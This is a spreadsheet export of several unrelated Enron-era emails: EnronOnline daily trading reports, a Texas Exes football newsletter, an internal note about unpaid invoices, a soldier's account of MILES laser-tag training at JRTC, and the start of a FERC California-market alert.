Friedman/HOU/ECT@ECT, Bob Crane/HOU/ECT@ECT, Joe Gold/LON/ECT@ECT, Richard=_x000D_
=20_x000D_
Lewis/LON/ECT@ECT, John L Nowlan/HOU/ECT@ECT, Paul=20_x000D_
Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark E Haedicke/HOU/ECT@ECT,=_x000D_
=20_x000D_
Dave Samuels/HOU/ECT@ECT, Rahil Jafry/HOU/ECT@ECT, Louise=20_x000D_
Kitchen/HOU/ECT@ECT, Bob Shults/HOU/ECT@ECT, Amita Gosalia/LON/ECT@ECT,=20_x000D_
George McClellan/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, Steven J=20_x000D_
Kean/HOU/EES@EES, Jim Fallon/Enron Communications@Enron Communications, Nic=_x000D_
k=20_x000D_
Mooney/LON/ECT@ECT, Jeffrey McMahon/HOU/ECT@ECT, Joseph P=20_x000D_
Hirl/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, William S Bradford/HOU/ECT@ECT,=_x000D_
=20_x000D_
Mark Frevert/NA/Enron@Enron, Paula Rieker/Corp/Enron@ENRON, Cedric=20_x000D_
Burgher/Corp/Enron@ENRON, Mark Koenig/Corp/Enron@ENRON, Kathryn=20_x000D_
Corbally/Corp/Enron@ENRON_x000D_
cc: David Forster/Corp/Enron@Enron, Sheri Thomas/HOU/ECT@ECT, Kal=20_x000D_
Shah/HOU/ECT@ECT, Andy Zipper/Corp/Enron@Enron, Michael=20_x000D_
Danielson/HOU/ECT@ECT, Tara Sweitzer/HOU/ECT@ECT=20_x000D_
Subject: EnronOnline Management Report for July 25, 2000_x000D_
_x000D_
Please see the attached Management Report for July 25, 2000:_x000D_
_x000D_
Total  Today Year To Date Life To Date_x000D_
_x000D_
_x000D_
Number of Transactions  2,414 208,531 213,532 =20_x000D_
Gross Notional Value $  953,437,294 100,025,268,454 101,286,159,437_x000D_
 =20_x000D_
Revenue from Physical flows to date ($)  6,618,570,908 6,714,322,400 =20_x000D_
_x000D_
 =20_x000D_
New Counterparties transacting today  0_x000D_
Counterparties having transacted to date  416_x000D_
_x000D_
_x000D_
_x000D_
Also attached is the Public Domain Report, containing information which is=_x000D_
=20_x000D_
intended for use in presentations or reports which will be seen by=20_x000D_
individuals outside Enron:_x000D_
_x000D_
Total Life to Date Transactions   &gt; 213,000 which is &gt; 59 % of Enron=01,s=_x000D_
=20_x000D_
current transactions for the month=20_x000D_
Average Daily Transactions    &gt; 2,000_x000D_
Life to Date Notional Value of Transactions &gt; $101 billion_x000D_
Average Daily Notional Value    =3D Approximately $1 billion, which is 45.5=_x000D_
% of=20_x000D_
Enron=01,s Notional Volume_x000D_
Number of Products Offered Each Day  =3D Approximately 820_x000D_
_x000D_
   =20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Rahil Jafry/HOU/ECT on 07/27/2000 07:09=_x000D_
=20_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Leonardo Pacheco@ENRON_x000D_
07/27/2000 03:52 PM_x000D_
To: Kenneth Lay/Corp/Enron@Enron, Jeff Skilling/Corp/Enron@ENRON, Joseph W=_x000D_
=20_x000D_
Sutton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cliff Baxter/HOU/ECT@ECT, Mike=_x000D_
=20_x000D_
McConnell/HOU/ECT@ECT, Jay Fitzgerald/Corp/Enron@ENRON, Mark=20_x000D_
Palmer/Corp/Enron@ENRON, John Sherriff/LON/ECT@ECT, Greg Whalley/HOU/ECT@EC=_x000D_
T,=20_x000D_
Jeffrey A Shankman/HOU/ECT@ECT, Kimberly Hillis/HOU/ECT@ect, Daniel=20_x000D_
Reck/HOU/ECT@ECT, Tim Belden/HOU/ECT@ECT, Thor Lien/OSL/ECT@ECT, Douglas S=_x000D_
=20_x000D_
Friedman/HOU/ECT@ECT, Bob Crane/HOU/ECT@ECT, Joe Gold/LON/ECT@ECT, Richard=_x000D_
=20_x000D_
Lewis/LON/ECT@ECT, John L Nowlan/HOU/ECT@ECT, Paul=20_x000D_
Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark E Haedicke/HOU/ECT@ECT,=_x000D_
=20_x000D_
Dave Samuels/HOU/ECT@ECT, Rahil Jafry/HOU/ECT@ECT, Louise=20_x000D_
Kitchen/HOU/ECT@ECT, Bob Shults/HOU/ECT@ECT, Amita Gosalia/LON/ECT@ECT,=20_x000D_
George McClellan/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, Steven J=20_x000D_
Kean/HOU/EES@EES, Jim Fallon/Enron Communications@Enron Communications, Nic=_x000D_
k=20_x000D_
Mooney/LON/ECT@ECT, Jeffrey McMahon/HOU/ECT@ECT, Joseph P=20_x000D_
Hirl/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, William S Bradford/HOU/ECT@ECT,=_x000D_
=20_x000D_
Mark Frevert/NA/Enron@Enron, Paula Rieker/Corp/Enron@ENRON, Cedric=20_x000D_
Burgher/Corp/Enron@ENRON, Mark Koenig/Corp/Enron@ENRON, Kathryn=20_x000D_
Corbally/Corp/Enron@ENRON_x000D_
cc: David Forster/Corp/Enron@Enron, Sheri Thomas/HOU/ECT@ECT, Kal=20_x000D_
Shah/HOU/ECT@ECT, Andy Zipper/Corp/Enron@Enron, Michael=20_x000D_
Danielson/HOU/ECT@ECT, Tara Sweitzer/HOU/ECT@ECT=20_x000D_
Subject: EnronOnline Management Report for July 26, 2000_x000D_
_x000D_
Please see the attached Management Report for July 26, 2000:_x000D_
_x000D_
Total  Today Year To Date Life To Date_x000D_
_x000D_
_x000D_
Number of Transactions  1,518 210,049 215,050 =20_x000D_
Gross Notional Value $  739,687,205 100,761,145,458 102,022,036,442_x000D_
 =20_x000D_
Revenue from Physical flows to date ($)  6,680,333,471 6,776,084,963 =20_x000D_
_x000D_
 =20_x000D_
New Counterparties transacting today  3_x000D_
Counterparties having transacted to date  419_x000D_
_x000D_
_x000D_
Also attached is the Public Domain Report, containing information which is=_x000D_
=20_x000D_
intended for use in presentations or reports which will be seen by=20_x000D_
individuals outside Enron:_x000D_
_x000D_
Total Life to Date Transactions   &gt; 215,000 which is &gt; 59 % of Enron=01,s=_x000D_
=20_x000D_
current transactions for the month=20_x000D_
Average Daily Transactions    &gt; 2,000_x000D_
Life to Date Notional Value of Transactions &gt; $102 billion_x000D_
Average Daily Notional Value    =3D Approximately $1 billion, which is 45.5=_x000D_
% of=20_x000D_
Enron=01,s Notional Volume_x000D_
Number of Products Offered Each Day  =3D Approximately 820_x000D_
_x000D_
          =20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 07:47:24 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">tEXas tailgatES talk_x000D_
_x000D_
Winning feels good, doesn't it? The road trip to Stillwater was fun._x000D_
We had several hundred people at the tailgate, and by the middle of_x000D_
the 3rd quarter, I think the Texas fans outnumbered the Oklahoma_x000D_
Aggies. All I will say about the booming Metropolis of Stillwater is_x000D_
I'm glad we do not return for 2 years. Brutal. Absolutely brutal._x000D_
_x000D_
45-17_x000D_
_x000D_
Texas looked a little sloppy early, but righted the ship to cruise_x000D_
on course. Oklahoma State had a solid game plan, but the Texas_x000D_
adjustments and superior talent overwhelmed the Cowboys. The running_x000D_
game re-appeared this week, and freshman stud-to-be Cedric Benson got_x000D_
his 1st career start. He did not disappoint. El Ced finished the day_x000D_
with 131 yards on 31 carries. His solid running opened up the passing_x000D_
lanes for Simms and Co., who picked apart the overmatched OSU secondary_x000D_
to the tune of 5 touchdown passes. All in all, the much-anticipated OU_x000D_
hangover did not come to pass. Texas took care of the weaker opponent,_x000D_
as they should have._x000D_
____________________________________________________________x000D_
Colorado_x000D_
2:30 pm_x000D_
ABC telecast_x000D_
_x000D_
ESPN Gameday (the radio edition, not the t.v. show) will be here for_x000D_
the game. Texas comes in ranked #8, and CU comes in ranked #14. This_x000D_
is a game both teams need to validate their seasons. Texas needs to_x000D_
show the world, and themselves, that they can indeed win a big game._x000D_
A win over the Buffaloes would catapult the Longhorns forward to a_x000D_
probable 10-win season (no offense, Aggies), while a loss could send_x000D_
this team into a tailspin. Colorado, much like Texas, is a different_x000D_
team at home. They have beaten some quality teams in Boulder, but now_x000D_
must show they have grown up and can win on the road. This is a HUGE_x000D_
game. If the 'horns hold serve, they should sail into College Station_x000D_
9-1, with a BCS birth on the line. This will not be easy. Texas has_x000D_
not seen a team that pounds the ball like CU does. The Buffs are #2_x000D_
in the Big XII/#13 in the nation in rushing offense (224.7 ypg)._x000D_
National t.v. coverage, temperature in the high 70's, 2 top 15 teams_x000D_
getting after it? I wouldn't want it any other way._x000D_
_x000D_
_x000D_
____________________________________________________________x000D_
_x000D_
There will be no television for the Missouri game. The Texas Athletic_x000D_
Department has asked the Missouri A.D. to allow a pay-per-view_x000D_
broadcast for next week. The final decision has not been made_x000D_
(as of Wednesday morning). If the game is on pay-per-view, it will be_x000D_
at 2:30, if it is not, it will be at 1:00. For those of you going to_x000D_
Columbia, the tailgate party will be at the Holiday Inn in Spanky's_x000D_
Sports Bar. I will have a start time as soon as I know a game time._x000D_
It will be posted on the link below:_x000D_
_x000D_
http://www.texasexes.org/chapters/TexasTailgates.html_x000D_
_x000D_
The Baylor tailgate will be at George's Party Zone on Dutton Avenue_x000D_
(just east of Floyd Casey Stadium) and is hosted by the Waco Texas_x000D_
Exes. Start time will be announced next week. Plans for the Texas_x000D_
A&amp;M game are still being discussed. Click the link below for more_x000D_
information._x000D_
_x000D_
http://www.texasexes.org/chapters/TexasTailgates.html_x000D_
_x000D_
Those of you needing bus information to Waco and College Station,_x000D_
click below:_x000D_
_x000D_
http://www.texasexes.org/news.php3?id=54_x000D_
_x000D_
_x000D_
____________________________________________________________x000D_
News and Notes:_x000D_
* Chris Simms tied a school record with 5 touchdown passes vs._x000D_
Oklahoma State (James Brown-'94- vs. Baylor). It's amazing what a_x000D_
running game will do for you._x000D_
* Cedric Benson now ranks #10 on the all time single-game freshman_x000D_
rushing record with his 131 yards. Charles Hunter holds the record_x000D_
with 187 (Houston - '87)._x000D_
* Benson was also named the starter for the CU game. His reign begins._x000D_
* Look for Texas to run the 3-4 and the 4-3 this week. The way the Buffs_x000D_
run the ball, Texas will show them many different looks._x000D_
* Last week Texas A&amp;M threw for 334 yards vs. CU. 334 yards from a_x000D_
team that HATES to throw. Look for the 'horns to throw early to set_x000D_
up the run._x000D_
* Injury update: Kalen Thornton (knee) is returning to practice this_x000D_
week. The defensive end should be ready to this weekend. The news is_x000D_
not as good for another de, O.J. McClintock (lacerated arm). Look for_x000D_
him to redshirt this year, unless they absolutely must have him._x000D_
* Colorado starting cb Roderick Sneed is out for this game with a_x000D_
pulled hamstring, and his backup, Phil Jackson, has a broken hand._x000D_
3rd team corner on Roy/B.J./Sloan/Tony/Kyle? Nice._x000D_
* Some Buffalo news you may not have heard: Jashon Sykes, the_x000D_
All-America candidate at middle linebacker, is done for the year with_x000D_
a herniated disc. His backup, Joey Johnson, was the Defensive Big XII_x000D_
Player of the Week last week._x000D_
_x000D_
____________________________________________________________x000D_
Around the Conference:_x000D_
* Nebraska beat Baylor, 48-7, but that's not the story, this is:_x000D_
the Cornhuskers had 641 yards rushing in the game. They had 4 backs_x000D_
go over 100 yards. 641 yards in one game. That's almost twice what_x000D_
Baylor has for the season (374)._x000D_
* Texas Tech whipped the Purple Wildcats from Kansas St, 38-19. Kliff_x000D_
Kingsbury threw for 409 yards and 4 touchdowns for the Red Raiders,_x000D_
the most passing yards ever allowed by K-State. The Wildcats are_x000D_
circling the drain. They are 0-3 in conference and 2-3 overall._x000D_
They draw the Aggies this week, while Tech gets a head check at_x000D_
Nebraska. Good luck, Raiders._x000D_
* Texas A&amp;M seems to run into the same wall when they don't play well:_x000D_
turnovers from sacks. Quarterback Mark Farris has fumbled 3 times_x000D_
after being hit from the blindside, and all 3 have been returned for_x000D_
touchdowns, the last one vs. Colorado._x000D_
* OU has named Jason White their starting quarterback, benching_x000D_
ineffective Nate Hybl. A quarterback controversy, how interesting._x000D_
_x000D_
_x000D_
Have a good weekend. See you at the Alumni Center on Saturday!_x000D_
_x000D_
_x000D_
Hook'em_x000D_
_x000D_
Trey McLean_x000D_
Texas Exes_x000D_
_x000D_
_____________________________________________________________x000D_
What do the following have in common?_x000D_
_x000D_
Politics and Pickles_x000D_
Artists and Attorneys_x000D_
NASA Engineers and a NFL franchise_x000D_
_x000D_
_x000D_
They're all found in The Texas Orange Pages_x000D_
The free on-line business listing for University of Texas grads._x000D_
http://www.TexasOrangePages.org_x000D_
_x000D_
_____________________________________________________________x000D_
_x000D_
IBleedBurntOrange@alumni.utexas.net_x000D_
_x000D_
You know, you only need ONE email for life._x000D_
_x000D_
What's Yours?_x000D_
_x000D_
The Texas Ex free email forwarding service._x000D_
http://www.alumni.utexas.net_x000D_
_x000D_
_____________________________________________________________x000D_
_x000D_
FORWARD THIS EMAIL TO A FRIEND!_x000D_
_x000D_
To subscribe to the Texas Tailgate Talk send this email to_x000D_
texasexeschapters@alumni.utexas.edu with SUBSCRIBE in the_x000D_
subject line.  Be sure and include YOUR FULL NAME in the body_x000D_
of the email.  If you want to change where we send the email,_x000D_
update your free Texas Ex forwarding email by going to_x000D_
http://www.alumni.utexas.net_x000D_
_x000D_
You can also update your record at:_x000D_
https://dpweb1.dp.utexas.edu/nlogon/alumni-address/_x000D_
_x000D_
To unsubscribe send an email with UNSUBSCRIBE in the subject_x000D_
line to texasexeschapters@alumni.utexas.edu.  Be sure and_x000D_
include YOUR FULL NAME in the body of the email._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 12:37:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'larry.pavlou@enron.com', 'loren.penkava@enron.com'})</t>
  </si>
  <si>
    <t>RE: Post Rock K# 104759</t>
  </si>
  <si>
    <t xml:space="preserve">Loren/Larry, we have been trying to locate a Marketer for Post Rock for some time now.  Post Rock is now our only hold-out that has not signed their extension agreement so that we could send them their Rate Case Refund invoices that are dated 9/1/1999 so becuase of that, all of those invoices are still sitting on our accounts receivable account plus they have not yet paid their Reservation invoices for_x000D_
Nov. 2000 thru March 2001.  The Market Service Rep (Randy Janzen and Harry Woodson) was going to call them to today to find out why they hadn't paid their Reservation invoices but we may need help from Marketing to see if we can get this extension agreement signed.  Please let me know if you have talked with anyone at Post Rock and if you need anything from our group._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Raetta_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Buehler, Craig  _x000D_
Sent:	Wednesday, October 17, 2001 1:00 PM_x000D_
To:	Zadow, Raetta; Penkava, Loren; Pavlou, Larry_x000D_
Subject:	Post Rock K# 104759_x000D_
_x000D_
_x000D_
Raetta,_x000D_
_x000D_
	You called with a few questions about Post Rock K# 104759; Larry and/or Loren should be able to assist you.  Post Rock apparently thought this agreement had a one year term.  It seems we amended the deal, unilaterally, to extend their term to 5 years (per note in the Envision file).  You stated that Post Rock has not paid any of their invoices in nearly a year which leads me to believe they consider the deal terminated (are they nominating on this contract?).  Larry or Loren is the Account Manager for Post Rock (both names appear in the file) so they should field your questions. _x000D_
_x000D_
Craig_x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 17:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'c_keels@hotmail.com', 'scott_hocutt@hotmail.com', 'm.montano@mail.utexas.edu', 'ebass@ect.enron.com', 'mstahlin@hotmail.com', 'a_diekman@hotmail.com', 'david.dickey@us.cgeyc.com', 'cll@prodigy.net', 'srhea@acm.org', 'chris_a_regnier@yahoo.com', 'john9375@aol.com', 'blawler875@aol.com', 'chmargau@aol.com'})</t>
  </si>
  <si>
    <t>Hey Guys,  I just typed a small novel (below) about JRTC and thought I send_x000D_
it out, it's answerin a question a friend asked about how the simulated_x000D_
comabt stuff works and has an example at the end._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Excellent question (about what makes the bad guys run away during an_x000D_
exercise)._x000D_
_x000D_
_x000D_
The Army paid Grumman a shitload of cash to make "laser tag" stuff for us._x000D_
_x000D_
It's called MILES and if you ever see a picture of an army unit on an_x000D_
exercise you will see that the soldier is wearing a harness over his normal_x000D_
Load Bearing Vest(LBV), the harness has four receptors on the front and four_x000D_
on the back, in addition there is a doughnut shaped belt of receptors that_x000D_
goes on the kevlar helmet.  Vehicles also have receptors mounted to them,_x000D_
every thing from HMMV's to the tanks to the helicopters._x000D_
_x000D_
Our weapons systems have transmitters on them, it'll look like a little box_x000D_
mounted on the front of the weapon, the box has a pressure sensor so every_x000D_
time the gas from a blank round firing hits it it fires a laser beam down_x000D_
range.  If the laser beam strikes a receptor the guys harness will emit this_x000D_
God awful high pitched whine that lets everyone know he is down/dead._x000D_
AT-4's and Dragons (bazooka like anti-armor weapons) are simulated by what_x000D_
are called Vipers, same weight, same size, except it fires a big powerful_x000D_
laser that will be strong enough to activate an enemy tanks MILES.  The_x000D_
armor vehicles MILES game is pretty neat.  There are two types of kills on a_x000D_
tank, a Mobility kill, and a critical kill.  If the Viper or other weapon_x000D_
doesn't have a solid hit on a sensor in a critical area, a mobility kill_x000D_
will result which means the explosion just blew the trak of the vehicle but_x000D_
its' radios and weapons still work.  A critical kill means, the vehicle and_x000D_
all inside are dead dead dead.  If a tank gets a critical kill the MILES_x000D_
gear will actually shut the vehicle down and kill its radios.  The guy will_x000D_
just be drivin along and then he will hear over his radio a females voice_x000D_
say, "Critical kill" and the only thing that will work on the vehicle after_x000D_
that are the brakes._x000D_
_x000D_
So, direct fire weapons systems are pretty easy to replicate, target wears a_x000D_
receptor, shooter fires a transmitter._x000D_
_x000D_
Indirect fire weapons though are a bit more difficult,  whereas before the_x000D_
shooter always had eyes on the target and thus could directly place a laser_x000D_
beam on target, artillery often shoots targets that no one directly see._x000D_
_x000D_
There are two ways around this.   At the National Training Center (NTC)_x000D_
where they do all the armor against armor training, they have the MILES 2000_x000D_
system.  You have an armored motorized rifle company(MRC) sitting at point_x000D_
X,  I have an observer 15Km away who, with optics can see your_x000D_
MRC, my FO calls in a fire mission, based on the target description a Bn 3_x000D_
will be fired (54 rounds fired in 3 volleys as there are only 18 tubes in a_x000D_
Bn.  The Observer-Controllers (OCs), kinna like referees, will monitor the_x000D_
Call for Fire from the observer to the tubes, and the OCs will take the fire_x000D_
mission data and plug it into their big MILES computer which will take into_x000D_
account any errors the observer may have made and any errors the gun_x000D_
batteries (instead of Artillery Companies we have artillery Batteries (6_x000D_
guns)) may have made.  When the gun batteries tell the observer that they_x000D_
have pulled the trigger, the OCs, who are always listening, will pull the_x000D_
Miles trigger.  What happens then is a satellite hovering above NTC will_x000D_
blast down a laser with a footprint large enough to simulate the area 18_x000D_
artillery rounds would take up, it will do this 3 times to simulate all 3_x000D_
volleys landing.  Any vehicles caught in this footprint will be assessed as_x000D_
damaged/destroyed._x000D_
_x000D_
At JRTC where the Light Fighters (i.e. no armor assets organic to them)_x000D_
learn to play,  we don't get no stinkin satellites.  What we do there is,_x000D_
when a fire mission is called to the guns, the OCs will monitor it and enter_x000D_
the data in their computers, the computer will take into account any errors_x000D_
made by the FO and the guns and will spit out a grid coordinate,  this grid_x000D_
will be passed to a "Fire Marker" which is a crazy guy with a four wheeler,_x000D_
a GPS, and a god gun (a hand held transmitter that fires a universal kill_x000D_
laser i.e. men to tanks and aircraft).  I say crazy because these guys are_x000D_
civilians who get bonuses based on how fast they can get to the target grid._x000D_
  Their average response time is 4 1/2 minutes, which is about 3 minutes_x000D_
longer then it would be in real life so it's not as cool as MILES 2000.  So_x000D_
you'll see these guys haulin ass through the woods on theses 4 wheelers_x000D_
tryin to get to their target grids on time, and God help you if he pulls up_x000D_
into your position and no you can't haul ass if you see one comin your way_x000D_
cause your OC who is walkin with your unit will zap you on the spot if he_x000D_
sees you runnin from a fire marker.  I'll close this bad boy with a little_x000D_
story._x000D_
_x000D_
"Oh shit, there I was" (all good 'war' stories gotta start with this)._x000D_
We had started the first phase of the rotation, "Entry into the Box" (the_x000D_
box is the JRTC engagement area) at 2300hrs the previous night and had_x000D_
fought our way 7 Km SW hand railing a road, identifying mine/wire obstacles_x000D_
and eliminating the Observers over watching them.  It was 0800 the next_x000D_
morning and we were dead f-kin tired and had finally reached our main_x000D_
objective which was a road inter-section in a semi wooded area just to the_x000D_
south of the main air field that the rest of the Brigade Combat Team (BCT)_x000D_
was gonna use to lift in the rest of the support assets.  There was a BIG_x000D_
triangular berm area just off the road, basically the dirt walls were 10 ft_x000D_
tall 50 yard long.  We moved out of the tree line and occupied it cause at_x000D_
the time it looked like it would be super easy to defend, which was good_x000D_
cause we needed to hole up for a bit and catch out breath, plus our COLT_x000D_
team (Combat Observer Laser Team = mounted (on a HMMVV) FO's with Laser_x000D_
designators to guide Copperheads and Hellfire missiles, basically vehicle_x000D_
killers) and Bradley support vehicles had just 'discovered' (BOOM) a mine_x000D_
field at the intersection, this was happening as we were occupying the berm._x000D_
  So we detached a small element to go evac the Casualties from the_x000D_
vehicles, the 1SG and a couple of joes. 3 min later the 1SG and his team_x000D_
were nailed by anti-personnel mines surrounding the mine field while trying_x000D_
to aid the wounded inside the vehicles.  At the same time a "Civilian" truck_x000D_
with two redneck lookin females showed up like they were fixin to drive_x000D_
right on through the road so we had to send a few guys out of the berm to_x000D_
stop/search the vehicle (at JRTC they employ real civilian actors to portray_x000D_
Civilians on the Battlefield or COBs, because in real life there are COBs_x000D_
and we gotta know how to deal with them and accomplish our mission at the_x000D_
same time).  So we got the 1SG and a couple of guys down at the obstacle, a_x000D_
COB truck right outside the berm when the CO decides to go check on the_x000D_
obstacle.  By this time we had been in this BIG berm (read TRP (Target_x000D_
Reference Point or somethin the enemy probably has his guns laid on just_x000D_
waitin for some morons to park their sad tired asses in there long enough to_x000D_
get a mission off)) for like 15 minutes when sure enough off in the distance_x000D_
we hear this vrrrrrm getting steadily louder and louder.  We were so tired_x000D_
we were basically denying the obvious, "there's no way he's headed for us,_x000D_
please God don't let him be headed for us" basically you had an entire_x000D_
company in a 100 yard radius which is about the same size as a 82mm mortar_x000D_
impact area.  So there we are listening to this 4 wheeler get closer and_x000D_
closer and basically all we can do is start to get all our gear back on and_x000D_
get ready to HAUL ass.  Of course we can't legally run until the first round_x000D_
impacts.  So this guys comes tearin down the road, shoots off the road and_x000D_
pulls SMACK DAB into the middle of the berm, jumps off his bike and starts_x000D_
UNLOADING with air burst Arty Simulators (basically a little flare gun that_x000D_
pops 1/4 sticks of TNT up 40 ft into the air to simulate incoming rounds._x000D_
Note: these are only used when the grid is so accurate that using ground_x000D_
burst simulators would pose a hazard to troops).  Basically what this told_x000D_
us is that we were setup, the baddies were just waitin for us cause the_x000D_
rounds were accurate on the first volley and needed no adjustment.  So yeah,_x000D_
this joker is poppin off airburst TNT, after the first burst I yelled_x000D_
INCOMING and got up and hauled ASS.  Luckily I was close to the exit and_x000D_
started movin out FAST, because between airbursts the Fire Marker was just_x000D_
sweeping left to right with the God gun as guys were scramblin tryin to get_x000D_
out.  I got out of the Berm and just kept runnin a good 200M because I'm_x000D_
Artillery and I know what the burst radius is on these suckers.  I looked_x000D_
back and saw the Infantry guys stoppin at a tree just outside the berm._x000D_
Since there were no visible Real life ground bursts they thought they were_x000D_
safe.  As I was yellin at them to keep movin an OC came out and just whacked_x000D_
em all (16 guys).  As the rest of the people who made it out were still_x000D_
runnin, about 25 of us and we were all now 150-200M North of the berm,_x000D_
scattered all over hell.  Little bunches of 5-6 guys runnin to trees and_x000D_
collapsing.  Just as the last of the living made it out of the berm, we hear_x000D_
this vehicle come tearing outta the trees about 50M to our left and from_x000D_
lower ground.  Sure enough it's a DsHKA (read Dishka, basically a 50 Cal on_x000D_
a friggin truck bed),  so there this fucker is lighting us up from the left_x000D_
and enemy 82mm Mortar fire blastin our tail ends.  Since the DsHKA was a_x000D_
high payoff TGT I was immediately on my net sreamin "Holy Shit we got a_x000D_
DsHKA here, Grid 785436 HELLLLPPPP!!!"  At the same time we got Infantry_x000D_
guys tryin to suppress the joker on the back of truck with their M4's while_x000D_
trying to get two Vipers together (we were told by the OC's that the only_x000D_
thing they've ever seen kill vehicle here with was two Vipers fired at the_x000D_
same section of the vehicle at exactly the same time)  but the Viper teams_x000D_
were scattered all over hell.  All this happened within about 30 seconds,_x000D_
the CO had seen us come tearin outta the Berm and heard the DsHKA light up_x000D_
so he was on his net talkin to the Kiowa's (scout helicopters but they're_x000D_
armed).  So we're pinned down, trying to suppress this truck while dodgin 50_x000D_
Cal laser blasts (since its just MILES a blade of grass can deflect the_x000D_
laser).  FINALLY the Kiowas show up (actually they got there respectably_x000D_
fast only 2-3 minutes) chase the bastard down and smash him with their_x000D_
hellfires.  With 30 of 65 guys dead, and one DsHKA down, we were ready to_x000D_
get a little rest and then start huntin the mortar and other 2 DsHKAs that_x000D_
were supposed to be in the area._x000D_
_x000D_
Basically we got the shit ambushed outta us, it was really a pretty nice_x000D_
setup on the enemies part.  We were stupid enough to setup in an obvious_x000D_
terrain feature, one that was no doubt on the Enemy's target lists.  So when_x000D_
the mortar rounds started droppin and we started pouring out of the berm_x000D_
there the 50 cal was waitin to mow down whoever didn't get killed by the_x000D_
Arty._x000D_
_x000D_
Anyways, that's one of my JRTC stories and subsequently one of the largest_x000D_
e-mails I've ever written. So I'm gonna forward it to the rest of the guys._x000D_
_x000D_
Welp, its about time to go get my drink on, talk to y'all later._x000D_
_x000D_
LAWLER,OUT._x000D_
_x000D_
 &gt;Hell, I thought Consultants had a lotta acronyms.....Hey when you guys go_x000D_
&gt;through these exercises, what makes someone high tail out of an attack_x000D_
&gt;stance...i.e. I know you're not firing live rounds at one another, so how_x000D_
&gt;do they simulate real life scenarios?  Also, in concerns with deer hunting,_x000D_
&gt;I'll be headed down to Junction (our lease) to pull a trophy this weekend._x000D_
&gt;I'll probably freeze my ass off, but I've had my deer picked out since_x000D_
&gt;Sept.  Later._x000D_
&gt;_x000D_
&gt;Dickey_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_______________________________________________________________________x000D_
&gt;The information contained in this communication is intended solely for the_x000D_
&gt;use of the individual or entity to whom it is addressed and others_x000D_
&gt;authorized to receive it. It may contain confidential or legally privileged_x000D_
&gt;information. If you are not the intended recipient you are hereby notified_x000D_
&gt;that any disclosure, copying, distribution or taking any action in reliance_x000D_
&gt;on the contents of this information is strictly prohibited and may be_x000D_
&gt;unlawful. If you have received this communication in error, please notify_x000D_
&gt;us immediately by responding to this email and then delete it from your_x000D_
&gt;system. Cap Gemini Ernst &amp; Young is neither liable for the proper and_x000D_
&gt;complete transmission of the information contained in this communication_x000D_
&gt;nor for any delay in its receipt._x000D_
&gt;_x000D_
_x000D_
__________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com._x000D_
_x000D_
Share information about yourself, create your own public profile at_x000D_
http://profiles.msn.com.</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 09:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bounce-app-ippexecs-33275@ls.eei.org'})</t>
  </si>
  <si>
    <t>frozenset({'app-ippexecs@ls.eei.org'})</t>
  </si>
  <si>
    <t>Alliance Info Alert: FERC Report on Western Markets</t>
  </si>
  <si>
    <t xml:space="preserve">At its special meeting today, FERC released the results of its eagerly _x000D_
awaited probe into California's summer power crisis, concluding that under _x000D_
certain circumstances, California ratepayers were subjected to unjust and _x000D_
unreasonable power rates due to California's "seriously flawed" market _x000D_
structure and rules in conjunction with tight demand and supply conditions _x000D_
throughout the West._x000D_
_x000D_
The FERC staff report on western markets and the causes of the Summer 2000 _x000D_
Price Abormalities, entitled, Part I of Staff Report on U.S. Bulk Power _x000D_
Markets, is available at the following website: _x000D_
http://www.ferc.fed.us/electric/bulkpower.htm_x000D_
_x000D_
In response, FERC issued an order proposing a series of sweeping structural _x000D_
changes to the California ISO and PX to help remedy the pricing problems, and _x000D_
solicited public comment by November 22.  A technical conference has also _x000D_
been scheduled for November 9, to discuss the proposed solutions and other _x000D_
remedies that might be suggested (details TBA).  While all four commissioners _x000D_
supported the order, the order stretched the Commission.  Chairman Hoecker _x000D_
and Comm. Breathitt expressed strong endorsements, while Comms. Hebert and _x000D_
Massey concurred, citing areas where they felt the Commission had either _x000D_
"over-reached" or not gone far enough, as discussed below.  A final order is _x000D_
expected to be issued by year's end._x000D_
_x000D_
At the same time, the Commission warned California consumers of their _x000D_
continued risk of paying higher prices unless policy makers there resolve _x000D_
state issues, such as: (1) immediately implementing the availability of day _x000D_
ahead markets for power purchases; (2) development of demand responses; (3) _x000D_
siting of generation and transmission; and (4) assurance of sufficient _x000D_
reserve requirements._x000D_
_x000D_
Highlights of Proposed California Structural Remedy_x000D_
_x000D_
In its order, FERC proposed a series of market overhauls, including:_x000D_
_x000D_
(1) Eliminating the state's mandatory requirement that the state's _x000D_
investor-owned utilities buy and sell electricity through the PX, and allowing_x000D_
these utilities to purchase electricity through forward contracts and other _x000D_
alternative mechanisms to manage supply risks._x000D_
_x000D_
(2) Requiring market participants to schedule 95 percent of their _x000D_
transactions in the day-ahead market and instituting a penalty charge for _x000D_
under-scheduling (in excess of five percent of hourly load requirements), in _x000D_
order to discourage over-reliance on the real-time spot market._x000D_
_x000D_
(3) Establishing independent, non-stakeholder governing boards for the ISO _x000D_
and PX._x000D_
_x000D_
(4) Modifying the current single price auction system by (a) imposing a _x000D_
temporary $150/MWh "soft cap" that prohibits supply bids in excess of $150 _x000D_
